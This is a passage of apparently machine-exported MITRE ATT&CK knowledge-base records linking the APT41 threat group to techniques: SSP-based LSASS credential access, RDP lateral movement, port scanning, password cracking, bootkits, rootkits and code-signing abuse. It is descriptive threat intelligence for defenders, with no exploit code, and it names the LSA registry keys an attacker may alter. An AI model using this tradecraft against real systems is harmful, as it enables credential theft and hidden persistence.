Windows Security Support Provider (SSP) DLLs are loaded into the LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
|
||
|
||
The following SSPs can be used to access credentials:
|
||
|
||
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
|
||
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
|
||
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
|
||
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
||
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
|
||
technique_id : T1003.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
|
||
relationship_id : relationship--e7bcc9e7-d373-4b1e-a664-886c4fc04bc5
|
||
revoked : False
|
||
technique : Remote Desktop Protocol
|
||
technique_description : Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
|
||
|
||
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
|
||
|
||
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
|
||
technique_id : T1021.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Creation', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Logon Session: Logon Session Metadata']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--883558d8-c445-45cf-a5cd-841fdf49f311
|
||
revoked : False
|
||
technique : Network Service Discovery
|
||
technique_description : Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
||
|
||
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to an on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
|
||
|
||
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use an mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
|
||
technique_id : T1046
|
||
matrix : mitre-attack
|
||
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers', 'Network']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Cloud Service: Cloud Service Enumeration']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--79958036-a8bf-4808-af4f-f9f7a9cb6e7c
|
||
revoked : False
|
||
technique : Password Cracking
|
||
technique_description : Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes is obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes; this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A)
|
||
|
||
Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The plaintext password recovered from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
|
||
technique_id : T1110.002
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'Network']
|
||
data_sources : ['User Account: User Account Authentication', 'Application Log: Application Log Content']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--48132286-7b7d-42cf-956b-95c75eeff1e3
|
||
revoked : False
|
||
technique : Bootkit
|
||
technique_description : Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
|
||
|
||
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of the disk that is loaded first, once the BIOS has completed hardware initialization. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
|
||
|
||
The MBR passes control of the boot process to the VBR. As with the MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1542.003
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'Windows']
|
||
data_sources : ['Drive: Drive Modification']
|
||
permissions_required : ['Administrator', 'SYSTEM']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
|
||
relationship_id : relationship--1be07717-ad08-4364-9a58-b44a95a389a5
|
||
revoked : False
|
||
technique : Rootkit
|
||
technique_description : Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
|
||
|
||
Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system or lower, including a hypervisor, the Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1014
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Drive: Drive Modification', 'Firmware: Firmware Modification', 'File: File Modification']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--3213e4e5-c3e4-4d51-8dce-929248f2882b
|
||
revoked : False
|
||
technique : Code Signing
|
||
technique_description : Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
|
||
|
||
Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)
|
||
|
||
Code signing certificates may be used to bypass security policies that require signed code to execute on a system.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1553.002
|
||
matrix : mitre-attack
|
||
platform : ['macOS', 'Windows']
|
||
data_sources : ['File: File Metadata']
|
||
----------------------------------------------------------------------------------------------------
|